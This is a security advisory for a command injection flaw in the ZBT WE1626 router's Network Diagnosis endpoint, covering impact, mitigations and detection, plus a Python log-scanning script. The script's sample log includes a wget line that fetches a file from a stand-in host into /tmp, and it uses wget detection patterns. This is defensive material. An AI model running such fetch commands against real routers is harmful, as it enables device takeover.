CVE-2022-45551

9.8 CRITICAL

📋 TL;DR

This vulnerability allows attackers to execute arbitrary WGET commands through the Network Diagnosis endpoint, leading to privilege escalation on affected ZBT WE1626 routers. Attackers can gain administrative control over the router. Only users of ZBT WE1626 routers running vulnerable firmware are affected.

💻 Affected Systems

Products:
  • Shenzhen Zhiboton Electronics ZBT WE1626 Router
Versions: v21.06.18
Operating Systems: Embedded Linux
Default Config Vulnerable: ⚠️ Yes
Notes: Affects routers whose default configuration leaves the management interface exposed to the network.


⚠️ Risk & Real-World Impact

🔴 Worst Case

Complete compromise of the router with persistent backdoor installation, traffic interception, and lateral movement to connected devices.

🟠 Likely Case

Router takeover allowing network reconnaissance, DNS hijacking, and credential theft from connected clients.

🟢 If Mitigated

Limited impact if the router is behind a firewall with restricted WAN access and strong network segmentation.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Exploitation requires network access to the router's web interface.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: No official advisory found

Restart Required: No

Instructions:

Check vendor website for firmware updates. If unavailable, consider router replacement.

🔧 Temporary Workarounds

Disable Remote Administration

Applies to: all

Turn off remote management features to prevent external exploitation.

Access router admin panel > Advanced > Remote Management > Disable

Network Segmentation

Applies to: all

Isolate the router management interface from untrusted networks.

Configure firewall rules to restrict access to the router's IP on ports 80/443.

🧯 If You Can't Patch

  • Replace affected router with supported model
  • Implement strict network ACLs to limit router access to trusted IPs only

🔍 How to Verify

Check if Vulnerable:

Check the router firmware version in the admin interface; if it is 21.06.18, the device is vulnerable.

Check Version:

curl -s http://router-ip/status.cgi | grep version

Verify Fix Applied:

Verify that the firmware version has been updated beyond 21.06.18.

📡 Detection & Monitoring

Log Indicators:

  • Unusual WGET commands in system logs
  • Multiple failed authentication attempts to admin interface

Network Indicators:

  • Unexpected outbound connections from router
  • Unusual traffic patterns to/from router management interface

SIEM Query:

source="router.log" AND ("wget" OR "network_diagnosis")
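The SIEM query above and the log indicators listed in this section can be run as a small offline check over exported router logs. The script below is an added example and not part of this advisory; it assumes a syslog-style line format with `src=` and `endpoint=` fields (the real ZBT WE1626 log format is not shown here), and the sample lines are constructed. It mirrors the query (`wget` OR `network_diagnosis`, case-insensitive) and additionally counts repeated failed logins per source address, matching the second log indicator.

```python
import re
from collections import Counter

# Constructed sample log lines in an assumed syslog-like format.
# The actual ZBT WE1626 log layout is not documented on this page.
SAMPLE_LOG = """\
Jan 10 12:00:01 router httpd: request endpoint=status src=192.168.1.10 status=200
Jan 10 12:00:05 router httpd: request endpoint=network_diagnosis src=192.168.1.50 status=200
Jan 10 12:00:06 router sh: exec WGET http://203.0.113.7/x -O /tmp/x
Jan 10 12:00:30 router httpd: login failed user=admin src=198.51.100.9
Jan 10 12:00:31 router httpd: login failed user=admin src=198.51.100.9
Jan 10 12:00:32 router httpd: login failed user=admin src=198.51.100.9
Jan 10 12:00:40 router httpd: login failed user=admin src=192.168.1.10
Jan 10 12:01:00 router dnsmasq: started, version 2.80
"""

# Patterns mirroring the page's SIEM query: "wget" OR "network_diagnosis".
# Word boundaries on wget avoid matching unrelated tokens such as "swget".
WGET_RE = re.compile(r"\bwget\b", re.IGNORECASE)
DIAG_RE = re.compile(r"network_diagnosis", re.IGNORECASE)
# Failed-login lines carry the client address in an assumed src= field.
FAILED_LOGIN_RE = re.compile(r"login failed .*?src=(?P<src>\S+)", re.IGNORECASE)


def matches_siem_query(line):
    """True if the line would match the advisory's SIEM query."""
    return bool(WGET_RE.search(line) or DIAG_RE.search(line))


def find_indicators(log_text):
    """Return (line_number, reasons, line) for every line hitting an indicator."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        reasons = []
        if WGET_RE.search(line):
            reasons.append("wget")
        if DIAG_RE.search(line):
            reasons.append("network_diagnosis")
        if reasons:
            hits.append((lineno, reasons, line))
    return hits


def failed_login_sources(log_text, threshold=3):
    """Map source address -> failed-login count for sources at or above threshold."""
    counts = Counter()
    for line in log_text.splitlines():
        m = FAILED_LOGIN_RE.search(line)
        if m:
            counts[m.group("src")] += 1
    return {src: n for src, n in counts.items() if n >= threshold}


def analyze(log_text, threshold=3):
    """Combine both checks into one report dict."""
    return {
        "indicators": find_indicators(log_text),
        "repeated_failed_logins": failed_login_sources(log_text, threshold),
    }


if __name__ == "__main__":
    report = analyze(SAMPLE_LOG)
    for lineno, reasons, line in report["indicators"]:
        print(f"line {lineno} [{', '.join(reasons)}]: {line}")
    for src, n in report["repeated_failed_logins"].items():
        print(f"{n} failed admin logins from {src}")
```

On the constructed sample this flags the Network Diagnosis request and the wget execution, and reports 198.51.100.9 for three failed admin logins while ignoring the single failure from 192.168.1.10. Because a legitimate Network Diagnosis use also matches, treat the endpoint hit as a lead to correlate with a subsequent wget line or an unexpected outbound connection rather than as a confirmed compromise on its own.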
